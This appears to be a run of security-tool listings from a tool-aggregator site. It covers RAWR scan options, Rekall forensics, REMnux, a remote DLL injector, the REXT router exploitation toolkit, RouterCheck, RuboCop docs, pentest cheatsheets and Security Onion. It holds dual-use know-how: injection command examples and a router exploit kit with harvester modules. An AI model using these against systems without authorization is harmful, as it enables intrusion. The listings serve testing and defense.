      • Defaults: [conf/settings.py] follow subdomains, 3 links deep, timeout at 3min, limit to 300 urls
      • If graphviz and python-graphviz are installed, it will create a PNG diagram of each site that is crawled.
      • Start small and make adjustments outward in respect to your scanning environment. Please use caution to avoid trouble. :)

    • Use -S <1-5> to apply one of the crawl intensity presets. The default is 3.

    • --mirror is the same as --spider, but will also make a copy of each site during the crawl.

    • Use --spider-opts <opts> to define crawl settings on the fly.
      • 's' = 'follow subdomains', 'd' = depth, 't' = timeout, 'l' = url limit
      • Not all are required, nor do they have to be in any particular order.
      • Example: --spider-opts s:false,d:2,l:500

    • Also for spidering, --alt-domains <domains> will whitelist domains you want to follow during the crawl.
      • By default, it won't leave the originating domain.
      • Example: --alt-domains domain1.com,domain2.com,domain3.com
      • --blacklist-urls <input list> will blacklist domains you don't want to crawl.

    Output
    • -a is used to include all open ports in the CSV output and the Threat Matrix.

    • -m will create the Threat Matrix from provided input and exit (no scan).

    • -d <folder> changes the log folder's location from the default "./"
      • Example: -d ./Desktop/RAWR_scans_20140227 will create that folder and use it as your log dir.

    • -q or --quiet mutes display of the dinosaur on run.
      • Still in disbelief that anyone would want this... made 2 switches for it, to show that I'm a good sport. :)

    • Compress the log folder when the scan is complete with -z.

    • --json and --json-min are the automation-friendly outputs from RAWR.
      • --json only kicks out JSON lines to STDOUT, while still creating all of the normal output files.
      • --json-min creates no output files, only JSON strings to STDOUT

    • Use --parsertest if you're testing a custom parser. It parses input, displays the first 3 lines, and quits.

    • -v makes output verbose.

    Report Customization
    • -e excludes the 'Default password suggestions' from your output.
      • This was suggested as an 'Executive' option.

    • Give your HTML report a custom logo and title with --logo=<file> and --title=<title>.
      • The image will be copied into the report folder.
      • Click 'printable' in the HTML report to view the custom header.
    Updating
    • -u runs update and prompts if a file is older than the current version.
      • Files downloaded are defpass.csv and Ip2Country.tar.gz.
      • It checks for phantomJS and will download after prompting.

    • -U runs update and downloads the files mentioned above regardless of their version, without prompting.

    Rekall - The Most Complete Memory Analysis Framework


    The Rekall Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer visibilty into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research.

    The Rekall distribution is available from: http://www.rekall-forensic.com/
    Rekall should run on any platform that supports Python (http://www.python.org)

    Rekall supports investigations of the following x86 bit memory images:
    • Microsoft Windows XP Service Pack 2 and 3
    • Microsoft Windows 7 Service Pack 0 and 1
    • Linux Kernels 2.6.24 to 3.10.
    • OSX 10.6-10.8.
    Rekall also provides a complete memory sample acquisition capability for all major operating systems (see the tools directory).

    Quick start

    Rekall is available as a python package installable via the pip package manager. Simply type (for example on Linux):
    sudo pip install rekall
    You might need to specifically allow pre-release software to be included (until Rekall makes a major stable release):
    sudo pip install --pre rekall
    To have all the dependencies installed. You still need to have python and pip installed first.
    To be able to run the ipython notebook, the following are also required:
    pip install Jinja2 MarkupSafe Pygments astroid pyzmq tornado wsgiref
    For windows, Rekall is also available as a self contained installer package. Please check the download page for the most appropriate installer to use.

    Development version

    For development it is easier to install rekall inside a virtual env. Virtual Env is a way for containing and running multiple versions of python packages at the same time, without interfering with the host system.
    # You might need to install virtualenv:
    $ sudo apt-get install python-virtualenv
    
    # This will build a new empty python environment.
    $ virtualenv /tmp/Test
    
    # Now we switch to the environment - all python code runs from here.
    $ source /tmp/Test/bin/activate
    
    # This will install all dependencied into the virtual environment.
    $ pip install --pre rekall
    
    # For development run the devel version
    $ git clone https://github.com/google/rekall.git
    $ cd rekall
    $ python setup.py develop
    When done you can just remove the /tmp/Test directory.


    REMnux v6 - A Linux Toolkit for Reverse-Engineering and Analyzing Malware


    REMnux is a free Linux toolkit for assisting malware analysts with reverse-engineering malicious software. It strives to make it easier for forensic investigators and incident responders to start using the variety of freely-available tools that can examine malware, yet might be difficult to locate or set up.

    The heart of the project is the REMnux Linux distribution based on Ubuntu. This lightweight distro incorporates many tools for analyzing Windows and Linux malware, examining browser-based threats such as obfuscated JavaScript, exploring suspicious document files and taking apart other malicious artifacts. Investigators can also use the distro to intercept suspicious network traffic in an isolated lab when performing behavioral malware analysis.

    Malware Analyis Tools Installed on REMnux

    The REMnux distribution includes many free tools useful for examining malicious software. These utilities are set up and tested to make it easier for you to perform malware analysis tasks without needing to figure out how to install them. The majority of these tools are listed below.

    Examine Browser Malware

    Examine Document Files

    Extract and Decode Artifacts

    Handle Network Interactions

    Process Multiple Samples

    Examine File Properties and Contents

    Investigate Linux Malware

    Edit and View Files

    Examine Memory Snapshots

    Statically Examine PE Files

    Investigate Mobile Malware

    Perform Other Tasks

    REMnux Documentation 

    REMnux documentation is a relatively recent effort, which can provide additional details regarding the toolkit. The document set in need of improvement and expansion.

    The one-page REMnux cheat sheet highlights some of the most useful tools and commands available as part of the REMnux distro. It’s an especially nice starting point for people who are new to the distribution. 


    Download REMnux v6

    Remote DLL Injector v2.0 - Command-line Tool to Inject DLL into Remote Process


    Remote DLL Injector is the free command-line tool to Inject DLL into remote process. Currently it supports DLL injection using the CreateRemoteThread technique.

    Being a command-line tool makes it easy to integrate into your automation scripts. Also useful when you are remotely operating on the system especially during Pen Testing situations.

    One of the unique feature of Remote DLL Injector is its ability Inject DLL into ASLR enabled processes. It dynamically calculates DLL and function offsets within target process before the injection operation.

    It is fully portable & includes both 32-bit & 64-bit versions. It has been successfully tested on all platforms starting from Windows XP to Windows 8.

    How to use?

    Remote DLL Injector is a command-line based tool. Hence it must be launched from cmd prompt as shown below.

    Note that it includes 32-bit & 64-bit version. For Injecting DLL into 32-bit Process (on 32-bit or 64-bit platform) use RemoteDLLInjector32.exe and for 64-bit Process use RemoteDLLInjector64.exe

    Here are the simple usage information,
       RemoteDLLInjector.exe  <pid>  <dll_file_path>       
            -h                This help screen
            <pid>             Process ID of remote process to Inject DLL
            <dll_file_path>   Full path of DLL to be injected

    Examples of RemoteDLLInjector
    //Show the help screen
    RemoteDLLInjector.exe -h
     
    //Inject DLL into 32-bit process with pid 1551
    RemoteDLLInjector32.exe 1551 "c:\my project\inject32.dll"
     
    //Inject DLL into 64-bit process with pid 1001
    RemoteDLLInjector64.exe 1001 "c:\inject64.dll"


    Download Remote DLL Injector

    REXT - Router Exploitation Toolkit

    Small toolkit for easy creation and usage of various python scripts that work with embedded devices.
    • core - contains most of toolkits basic functions
    • databases - contains databases, like default credentials etc.
    • interface - contains code that is being used for the creation and manipulation with interface
    • modules - contains structure of modules, that can be loaded, every module contains vendor specific sub-modules where scripts are stored.
      • decryptors
      • exploits
      • harvesters
      • misc
      • scanners
    • output - output goes here
    This is still heavy work-in progress

    Requirements
    I am trying to keep the requirements minimal:
    • requests


    Download REXT

    RouterCheck - Android app for ensure the safety of your Router


    RouterCheck is a system for ensuring the well-being of your router and home network. It’s offered as a smartphone app, but is far more than just a simple smartphone app. RouterCheck communicates with a powerful server that helps to check whether your router is vulnerable to any of the latest attacks that hackers are launching.

    RouterCheck is Security for Your Home Router

    RouterCheck is so easy to use, yet performs some very advanced tests to ensure the safety of your home network. Simply start RouterCheck and the following things will automatically be tested for:

    Check your configuration

    Routers are complex devices and their configuration is sometimes difficult to understand. The configuration screens have many options, and it isn’t always clear what the effects of choosing an option will have on your network’s security. RouterCheck makes sure that you haven’t accidentally enabled something dangerous.

    Passwords

    RouterCheck will check to see whether you’ve changed your router’s default password (very dangerous) or are using a password that’s on hackers’ lists of common passwords to try. To learn more about password danger click Passwords.

    Dangerous things enabled

    RouterCheck will see whether you’ve enabled things that are “dangerous” such as UPnP or Remote Administration. If you have, RouterCheck will explain the security implications of this so that you can make an informed decision on what to do.

    Running the latest firmware

    RouterCheck checks that your router is updated with the latest firmware for your model, and if not, what steps you can take to update it.

    Vulnerabilities in your router

    RouterCheck will look through several lists of known vulnerabilities for your router model/firmware to see whether there are any known problems. It will also perform some of the same tests that hackers use to see how your router will respond.

    Open Ports

    RouterCheck will see if your network has any ports opened to the internet as a result of Port Forwarding. If there are and you have good reason to have the port opened, you can configure RouterCheck so that it will not flag this situation as an issue in the future.

    DNS is set up properly

    It’s well understood that when hackers attack home networks, the DNS configuration is the first thing they target. It’s very important that your DNS is reliable and trustworthy, otherwise all of the computers on your network are at risk.
    RouterCheck has several ways to check and ensure that the DNS servers that you’re using are reliable.

    Has the router been tampered with?

    RouterCheck will run some tests on your router to help determine if other things in the router have been tampered with by hackers.

    Are you a target?

    RouterCheck will look to see whether you’re on any of the common lists of targets that hackers typically use when looking for devices on the internet that are poorly secured and at risk.

    Resolution

    When RouterCheck finds that there are any problems with your router, it will help guide you towards the steps you must take to solve the problem.

    Checking public WiFi hotspots

    Do you ever use WiFi at a coffeeshop, restaurant or other public place? The dangers of using public WiFi are well understood and one of the issues is the reliability of the system’s DNS server. If a hacker were successful in compromising a coffeeshop router’s DNS settings, everyone who used the service would unknowingly become innocent victims.

    RouterCheck allows you to quickly scan a public WiFi hotspot to ensure that the system is safe to use.


    Rubocop - A Ruby Static Code Analyzer, Based On The Community Ruby Style Guide


    RuboCop is a Ruby static code analyzer. Out of the box it will enforce many of the guidelines outlined in the community Ruby Style Guide .

    Most aspects of its behavior can be tweaked via various configuration options.

    Installation
    RuboCop 's installation is pretty standard:
    $ gem install rubocop
    
    If you'd rather install RuboCop using bundler , don't require it in your Gemfile :
    gem 'rubocop', require: false
    

    Basic Usage
    Running rubocop with no arguments will check all Ruby source files in the current directory:
    $ rubocop
    
    Alternatively you can pass rubocop a list of files and directories to check:
    $ rubocop app spec lib/something.rb
    
    Here's RuboCop in action. Consider the following Ruby source code:
    def badName
      if something
        test
        end
    end
    Running RuboCop on it (assuming it's in a file named test.rb ) would produce the following report:
    Inspecting 1 file
    W
    
    Offenses:
    
    test.rb:1:5: C: Use snake_case for method names.
    def badName
        ^^^^^^^
    test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
      if something
      ^^
    test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
      if something
      ^^
    test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
        end
        ^^^
    
    1 file inspected, 4 offenses detected
    
    For more details check the available command-line options:
    $ rubocop -h
    
    Command flag Description
    -v/--version Displays the current version and exits.
    -V/--verbose-version Displays the current version plus the version of Parser and Ruby.
    -L/--list-target-files List all files RuboCop will inspect.
    -F/--fail-fast Inspects in modification time order and stops after first file with offenses.
    -C/--cache Store and reuse results for faster operation.
    -d/--debug Displays some extra debug output.
    -D/--display-cop-names Displays cop names in offense messages.
    -c/--config Run with specified config file.
    -f/--format Choose a formatter.
    -o/--out Write output to a file instead of STDOUT.
    -r/--require Require Ruby file (see Loading Extensions ).
    -R/--rails Run extra Rails cops.
    -l/--lint Run only lint cops.
    -a/--auto-correct Auto-correct certain offenses. Note: Experimental - use with caution.
    --only Run only the specified cop(s) and/or cops in the specified departments.
    --except Run all cops enabled by configuration except the specified cop(s) and/or departments.
    --auto-gen-config Generate a configuration file acting as a TODO list.
    --exclude-limit Limit how many individual files --auto-gen-config can list in Exclude parameters, default is 15.
    --show-cops Shows available cops and their configuration.
    --fail-level Minimum severity for exit with error code. Full severity name or upper case initial can be given. Normally, auto-corrected offenses are ignored. Use A or autocorrect if you'd like them to trigger failure.
    -s/--stdin Pipe source from STDIN. This is useful for editor integration.

    Cops
    In RuboCop lingo the various checks performed on the code are called cops. There are several cop departments.
    You can also load custom cops .

    Style
    Most of the cops in RuboCop are so called style cops that check for stylistics problems in your code. Almost all of the them are based on the Ruby Style Guide. Many of the style cops have configurations options allowing them to support different popular coding conventions.

    Lint
    Lint cops check for possible errors and very bad practices in your code. RuboCop implements in a portable way all built-in MRI lint checks ( ruby -wc ) and adds a lot of extra lint checks of its own. You can run only the lint cops like this:
    $ rubocop -l
    
    The -l / --lint option can be used together with --only to run all the enabled lint cops plus a selection of other cops.
    Disabling any of the lint cops is generally a bad idea.

    Metrics
    Metrics cops deal with properties of the source code that can be measured, such as class length, method length, etc. Generally speaking, they have a configuration parameter called Max and when running rubocop --auto-gen-config , this parameter will be set to the highest value found for the inspected code.

    Rails
    Rails cops are specific to the Ruby on Rails framework. Unlike style and lint cops they are not used by default and you have to request them specifically:
    $ rubocop -R
    
    or add the following directive to your .rubocop.yml :
    AllCops:
      RunRailsCops: true

    Configuration
    The behavior of RuboCop can be controlled via the .rubocop.yml configuration file. It makes it possible to enable/disable certain cops (checks) and to alter their behavior if they accept any parameters. The file can be placed either in your home directory or in some project directory.
    RuboCop will start looking for the configuration file in the directory where the inspected file is and continue its way up to the root directory.
    The file has the following format:
    inherit_from: ../.rubocop.yml
    
    Style/Encoding:
      Enabled: false
    
    Metrics/LineLength:
      Max: 99
    Note : Qualifying cop name with its type, e.g., Style , is recommended, but not necessary as long as the cop name is unique across all types.

    Inheritance
    RuboCop supports inheriting configuration from one or more supplemental configuration files at runtime.

    Inheriting from another configuration file in the project
    The optional inherit_from directive is used to include configuration from one or more files. This makes it possible to have the common project settings in the .rubocop.yml file at the project root, and then only the deviations from those rules in the subdirectories. The files can be given with absolute paths or paths relative to the file where they are referenced. The settings after an inherit_from directive override any settings in the file(s) inherited from. When multiple files are included, the first file in the list has the lowest precedence and the last one has the highest. The format for multiple inheritance is:
    inherit_from:
      - ../.rubocop.yml
      - ../conf/.rubocop.yml

    Inheriting configuration from a dependency gem
    The optional inherit_gem directive is used to include configuration from one or more gems external to the current project. This makes it possible to inherit a shared dependency's RuboCop configuration that can be used from multiple disparate projects.
    Configurations inherited in this way will be essentially prepended to the inherit_from directive, such that the inherit_gem configurations will be loaded first, then the inherit_from relative file paths will be loaded (overriding the configurations from the gems), and finally the remaining directives in the configuration file will supersede any of the inherited configurations. This means the configurations inherited from one or more gems have the lowest precedence of inheritance.
    The directive should be formatted as a YAML Hash using the gem name as the key and the relative path within the gem as the value:
    inherit_gem:
      rubocop: config/default.yml
      my-shared-gem: .rubocop.yml
      cucumber: conf/rubocop.yml
    Note : If the shared dependency is declared using a Bundler Gemfile and the gem was installed using bundle install , it would be necessary to also invoke RuboCop using Bundler in order to find the dependency's installation path at runtime:
    $ bundle exec rubocop <options...>
    

    Defaults
    The file config/default.yml under the RuboCop home directory contains the default settings that all configurations inherit from. Project and personal .rubocop.yml files need only make settings that are different from the default ones. If there is no .rubocop.yml file in the project or home directory, config/default.yml will be used.

    Including/Excluding files
    RuboCop checks all files found by a recursive search starting from the directory it is run in, or directories given as command line arguments. However, it only recognizes files ending with .rb or extensionless files with a #!.*ruby declaration as Ruby files. Hidden directories (i.e., directories whose names start with a dot) are not searched by default. If you'd like it to check files that are not included by default, you'll need to pass them in on the command line, or to add entries for them under AllCops / Include . Files and directories can also be ignored through AllCops / Exclude .
    Here is an example that might be used for a Rails project:
    AllCops:
      Include:
        - '**/Rakefile'
        - '**/config.ru'
      Exclude:
        - 'db/**/*'
        - 'config/**/*'
        - 'script/**/*'
        - !ruby/regexp /old_and_unused\.rb$/
    
    # other configuration
    # ...
    Files and directories are specified relative to the .rubocop.yml file.
    Note : Patterns that are just a file name, e.g. Rakefile , will match that file name in any directory, but this pattern style deprecated. The correct way to match the file in any directory, including the current, is **/Rakefile .
    Note : The pattern config/** will match any file recursively under config , but this pattern style is deprecated and should be replaced by config/**/* .
    Note : The Include and Exclude parameters are special. They are valid for the directory tree starting where they are defined. They are not shadowed by the setting of Include and Exclude in other .rubocop.yml files in subdirectories. This is different from all other parameters, who follow RuboCop's general principle that configuration for an inspected file is taken from the nearest .rubocop.yml , searching upwards.
    Cops can be run only on specific sets of files when that's needed (for instance you might want to run some Rails model checks only on files whose paths match app/models/*.rb ). All cops support the Include param.
    Rails/DefaultScope:
      Include:
        - app/models/*.rb
    Cops can also exclude only specific sets of files when that's needed (for instance you might want to run some cop only on a specific file). All cops support the Exclude param.
    Rails/DefaultScope:
      Exclude:
        - app/models/problematic.rb

    Generic configuration parameters
    In addition to Include and Exclude , the following parameters are available for every cop.

    Enabled
    Specific cops can be disabled by setting Enabled to false for that specific cop.
    Metrics/LineLength:
      Enabled: false
    Most cops are enabled by default. Some cops, configured in config/disabled.yml , are disabled by default. The cop enabling process can be altered by setting DisabledByDefault to true .
    AllCops:
      DisabledByDefault: true
    All cops are then disabled by default, and only cops appearing in user configuration files are enabled. Enabled: true does not have to be set for cops in user configuration. They will be enabled anyway.

    Severity
    Each cop has a default severity level based on which department it belongs to. The level is warning for Lint and convention for all the others. Cops can customize their severity level. Allowed params are refactor , convention , warning , error and fatal .
    There is one exception from the general rule above and that is Lint/Syntax , a special cop that checks for syntax errors before the other cops are invoked. It can not be disabled and its severity ( fatal ) can not be changed in configuration.
    Metrics/CyclomaticComplexity:
      Severity: warning

    AutoCorrect
    Cops that support the --auto-correct option can have that support disabled. For example:
    Style/PerlBackrefs:
      AutoCorrect: false

    Automatically Generated Configuration
    If you have a code base with an overwhelming amount of offenses, it can be a good idea to use rubocop --auto-gen-config and add an inherit_from: .rubocop_todo.yml in your .rubocop.yml . The generated file .rubocop_todo.yml contains configuration to disable cops that currently detect an offense in the code by excluding the offending files, or disabling the cop altogether once a file count limit has been reached.
    By adding the option --exclude-limit COUNT , e.g., rubocop --auto-gen-config --exclude-limit 5 , you can change how many files are excluded before the cop is entirely disabled. The default COUNT is 15.
    Then you can start removing the entries in the generated .rubocop_todo.yml file one by one as you work through all the offenses in the code.

    Disabling Cops within Source Code
    One or more individual cops can be disabled locally in a section of a file by adding a comment such as
    # rubocop:disable Metrics/LineLength, Style/StringLiterals
    [...]
    # rubocop:enable Metrics/LineLength, Style/StringLiterals
    You can also disable all cops with
    # rubocop:disable all
    [...]
    # rubocop:enable all
    One or more cops can be disabled on a single line with an end-of-line comment.
    for x in (0..19) # rubocop:disable Style/AvoidFor

    Formatters
    You can change the output format of RuboCop by specifying formatters with the -f/--format option. RuboCop ships with several built-in formatters, and also you can create your custom formatter.
    Additionally the output can be redirected to a file instead of $stdout with the -o/--out option.
    Some of the built-in formatters produce machine-parsable output and they are considered public APIs. The rest of the formatters are for humans, so parsing their outputs is discouraged.
    You can enable multiple formatters at the same time by specifying -f/--format multiple times. The -o/--out option applies to the previously specified -f/--format , or the default progress format if no -f/--format is specified before the -o/--out option.
    # Simple format to $stdout.
    $ rubocop --format simple
    
    # Progress (default) format to the file result.txt.
    $ rubocop --out result.txt
    
    # Both progress and offense count formats to $stdout.
    # The offense count formatter outputs only the final summary,
    # so you'll mostly see the outputs from the progress formatter,
    # and at the end the offense count summary will be outputted.
    $ rubocop --format progress --format offenses
    
    # Progress format to $stdout, and JSON format to the file rubocop.json.
    $ rubocop --format progress --format json --out rubocop.json
    #         ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~
    #                 |               |_______________|
    #              $stdout
    
    # Progress format to result.txt, and simple format to $stdout.
    $ rubocop --output result.txt --format simple
    #         ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~
    #                  |                 |
    #           default format        $stdout
    You can also load custom formatters .

    Progress Formatter (default)
    The default progress formatter outputs a character for each inspected file, and at the end it displays all detected offenses in the clang format. A . represents a clean file, and each of the capital letters means the severest offense (convention, warning, error or fatal) found in a file.
    $ rubocop
    Inspecting 26 files
    ..W.C....C..CWCW.C...WC.CC
    
    Offenses:
    
    lib/foo.rb:6:5: C: Missing top-level class documentation comment.
        class Foo
        ^^^^^
    
    ...
    
    26 files inspected, 46 offenses detected
    

    Clang Style Formatter
    The clang formatter displays the offenses in a manner similar to clang :
    $ rubocop test.rb
    Inspecting 1 file
    W
    
    Offenses:
    
    test.rb:1:5: C: Use snake_case for method names.
    def badName
        ^^^^^^^
    test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
      if something
      ^^
    test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
      if something
      ^^
    test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
        end
        ^^^
    
    1 file inspected, 4 offenses detected
    

    Fuubar Style Formatter
    The fuubar style formatter displays a progress bar and shows details of offenses in the clang format as soon as they are detected. This is inspired by the Fuubar formatter for RSpec.
    $ rubocop --format fuubar
    lib/foo.rb.rb:1:1: C: Use snake_case for methods and variables.
    def badName
        ^^^^^^^
    lib/bar.rb:13:14: W: File.exists? is deprecated in favor of File.exist?.
            File.exists?(path)
                 ^^^^^^^
     22/53 files |======== 43 ========>                           |  ETA: 00:00:02
    

    Emacs Style Formatter
    Machine-parsable
    The emacs formatter displays the offenses in a format suitable for consumption by Emacs (and possibly other tools).
    $ rubocop --format emacs test.rb
    /Users/bozhidar/projects/test.rb:1:1: C: Use snake_case for methods and variables.
    /Users/bozhidar/projects/test.rb:2:3: C: Favor modifier if/unless usage when you have a single-line body. Another good alternative is the usage of control flow &&/||.
    /Users/bozhidar/projects/test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
    

    Simple Formatter
    The name of the formatter says it all :-)
    $ rubocop --format simple test.rb
    == test.rb ==
    C:  1:  5: Use snake_case for method names.
    C:  2:  3: Use a guard clause instead of wrapping the code inside a conditional expression.
    C:  2:  3: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
    W:  4:  5: end at 4, 4 is not aligned with if at 2, 2
    
    1 file inspected, 4 offenses detected
    

    File List Formatter
    Machine-parsable
    Sometimes you might want to just open all files with offenses in your favorite editor. This formatter outputs just the names of the files with offenses in them and makes it possible to do something like:
    $ rubocop --format files | xargs vim
    

    JSON Formatter
    Machine-parsable
    You can get RuboCop's inspection result in JSON format by passing --format json option in command line. The JSON structure is like the following example:
    {
      "metadata": {
        "rubocop_version": "0.9.0",
        "ruby_engine": "ruby",
        "ruby_version": "2.0.0",
        "ruby_patchlevel": "195",
        "ruby_platform": "x86_64-darwin12.3.0"
      },
      "files": [{
          "path": "lib/foo.rb",
          "offenses": []
        }, {
          "path": "lib/bar.rb",
          "offenses": [{
              "severity": "convention",
              "message": "Line is too long. [81/80]",
              "cop_name": "LineLength",
              "corrected": true,
              "location": {
                "line": 546,
                "column": 80,
                "length": 4
              }
            }, {
              "severity": "warning",
              "message": "Unreachable code detected.",
              "cop_name": "UnreachableCode",
              "corrected": false,
              "location": {
                "line": 15,
                "column": 9,
                "length": 10
              }
            }
          ]
        }
      ],
      "summary": {
        "offense_count": 2,
        "target_file_count": 2,
        "inspected_file_count": 2
      }
    }

    Offense Count Formatter
    Sometimes when first applying RuboCop to a codebase, it's nice to be able to see where most of your style cleanup is going to be spent.
    With this in mind, you can use the offense count formatter to outline the offended cops and the number of offenses found for each by running:
    $ rubocop --format offenses
    
    87   Documentation
    12   DotPosition
    8    AvoidGlobalVars
    7    EmptyLines
    6    AssignmentInCondition
    4    Blocks
    4    CommentAnnotation
    3    BlockAlignment
    1    IndentationWidth
    1    AvoidPerlBackrefs
    1    ColonMethodCall
    --
    134  Total
    

    HTML Formatter
    Useful for CI environments. It will create an HTML report like this .
    $ rubocop --format html -o rubocop.html
    

    Compatibility
    RuboCop supports the following Ruby implementations:
    • MRI 1.9.3
    • MRI 2.0
    • MRI 2.1
    • MRI 2.2
    • JRuby in 1.9 mode
    • Rubinius 2.0+

    Editor integration

    Emacs
    rubocop.el is a simple Emacs interface for RuboCop. It allows you to run RuboCop inside Emacs and quickly jump between problems in your code.
    flycheck > 0.9 also supports RuboCop and uses it by default when available.

    Vim
    The vim-rubocop plugin runs RuboCop and displays the results in Vim.
    There's also a RuboCop checker in syntastic .

    Sublime Text
    If you're a ST user you might find the Sublime RuboCop plugin useful.

    Brackets
    The brackets-rubocop extension displays RuboCop results in Brackets. It can be installed via the extension manager in Brackets.

    TextMate2
    The textmate2-rubocop bundle displays formatted RuboCop results in a new window. Installation instructions can be found here .

    Atom
    The atom-lint package runs RuboCop and highlights the offenses in Atom.
    You can also use the linter-rubocop plugin for Atom's linter .

    LightTable
    The lt-rubocop plugin provides LightTable integration.

    RubyMine
    The rubocop-for-rubymine plugin provides basic RuboCop integration for RubyMine/IntelliJ IDEA.

    Other Editors
    Here's one great opportunity to contribute to RuboCop - implement RuboCop integration for your favorite editor.

    Git pre-commit hook integration
    overcommit is a fully configurable and extendable Git commit hook manager. To use RuboCop with overcommit, add the following to your .overcommit.yml file:
    PreCommit:
      RuboCop:
        enabled: true

    Guard integration
    If you're fond of Guard you might like guard-rubocop . It allows you to automatically check Ruby code style with RuboCop when files are modified.

    Rake integration
    To use RuboCop in your Rakefile add the following:
    require 'rubocop/rake_task'
    
    RuboCop::RakeTask.new
    If you run rake -T , the following two RuboCop tasks should show up:
    rake rubocop                                  # Run RuboCop
    rake rubocop:auto_correct                     # Auto-correct RuboCop offenses
    The above will use default values
    require 'rubocop/rake_task'
    
    desc 'Run RuboCop on the lib directory'
    RuboCop::RakeTask.new(:rubocop) do |task|
      task.patterns = ['lib/**/*.rb']
      # only show the files with failures
      task.formatters = ['files']
      # don't abort rake on failure
      task.fail_on_error = false
    end

    Caching
    Large projects containing hundreds or even thousands of files can take a really long time to inspect, but RuboCop has functionality to mitigate this problem. There's a caching mechanism that stores information about offenses found in inspected files.

    Cache Validity
    Later runs will be able to retrieve this information and present the stored information instead of inspecting the file again. This will be done if the cache for the file is still valid, which it is if there are no changes in:
    • the contents of the inspected file
    • RuboCop configuration for the file
    • the options given to rubocop , with some exceptions that have no bearing on which offenses are reported
    • the Ruby version used to invoke rubocop
    • version of the rubocop program (or to be precise, anything in the source code of the invoked rubocop program)

    Enabling and Disabling the Cache
    The caching functionality is enabled if the configuration parameter AllCops: UseCache is true , which it is by default. The command line option --cache false can be used to turn off caching, thus overriding the configuration parameter. If AllCops: UseCache is set to false in the local .rubocop.yml , then it's --cache true that overrides the setting.

    Cache Path
    By default, the cache is stored in in a subdirectory of the temporary directory, /tmp/rubocop_cache/ on Unix-like systems. The configuration parameter AllCops: CacheRootDirectory can be used to set it to a different path. One reason to use this option could be that there's a network disk where users on different machines want to have a common RuboCop cache. Another could be that a Continuous Integration system allows directories, but not a temporary directory, to be saved between runs.

    Cache Pruning
    Each time a file has changed, its offenses will be stored under a new key in the cache. This means that the cache will continue to grow until we do something to stop it. The configuration parameter AllCops: MaxFilesInCache sets a limit, and when the number of files in the cache exceeds that limit, the oldest files will be automatially removed from the cache.

    Extensions
    It's possible to extend RuboCop with custom cops and formatters.

    Loading Extensions
    Besides the --require command line option you can also specify ruby files that should be loaded with the optional require directive in the .rubocop.yml file:
    require:
     - ../my/custom/file.rb
     - rubocop-extension
    Note: The paths are directly passed to Kernel.require . If your extension file is not in $LOAD_PATH , you need to specify the path as relative path prefixed with ./ explicitly, or absolute path.

    Custom Cops
    You can configure the custom cops in your .rubocop.yml just like any other cop.

    Known Custom Cops

    Custom Formatters
    You can customize RuboCop's output format with custom formatters.

    Creating Custom Formatter
    To implement a custom formatter, you need to subclass RuboCop::Formatter::BaseFormatter and override some methods, or implement all formatter API methods by duck typing.
    Please see the documents below for more formatter API details.

    Using Custom Formatter in Command Line
    You can tell RuboCop to use your custom formatter with a combination of --format and --require option. For example, when you have defined MyCustomFormatter in ./path/to/my_custom_formatter.rb , you would type this command:
    $ rubocop --require ./path/to/my_custom_formatter --format MyCustomFormatter
    


    Download Rubocop

    Security CheatSheets - A collection of cheatsheets for various infosec tools and topics


    These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets are to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in Kali Linux.

    Requirements


    How to Use

    In order to use these cheatsheets, the cheatsheets in this repository need to go into ~/.cheat/ directory. After the files are moved into that directory, cheat ncat will display the ncat cheatsheet.

    CheatSheets:
    • aircrack-ng
    • cewl
    • cidr
    • cookies
    • dig
    • fierce
    • ftp
    • http
    • https-ssl-tls
    • hydra
    • john
    • maltego
    • markdown
    • medusa
    • metasploit
    • mysql
    • ncat
    • nikto
    • nping
    • permissions
    • php
    • pivoting
    • ps
    • python
    • ruby
    • shadow
    • shodan
    • sqlmap
    • tcpdump
    • webservervulns
    • wireless-encryptions
    • wireshark

    Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management


    Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!


    Easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes


    Analyze your NIDS/HIDS alerts with Squert


    Pivot between multiple data types with Sguil and send pcaps to Wireshark and NetworkMiner


    Use ELSA to slice and dice your logs


    Access full packet capture with CapMe


    Snort/Suricata and Bro compiled with PF_RING to handle lots of traffic


    Easy updates

    Data Types

    • Alert data - HIDS alerts from OSSEC and NIDS alerts from Snort/Suricata
    • Asset data from Prads and Bro
    • Full content data from netsniff-ng
    • Host data via OSSEC and syslog-ng
    • Session data from Argus, Prads, and Bro
    • Transaction data - http/ftp/dns/ssl/other logs from Bro

    Download Security Onion

    SecuritySoftView - Displays the AntiVirus / AntiSpyware / Firewall registered with the security center of Windows


    SecuritySoftView is a simple tool that displays the AntiVirus, AntiSpyware, and Firewall programs that are currently installed on your system and registered with the security center of Windows operating system.

    System Requirements

    This utility works on any version of Windows, starting from Windows XP and up to Windows 10. Both 32-bit and 64-bit systems are supported. However, on Windows XP, SecuritySoftView displays less information than Windows Vista or later.

    Start Using SecuritySoftView

    SecuritySoftView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - SecuritySoftView.exe
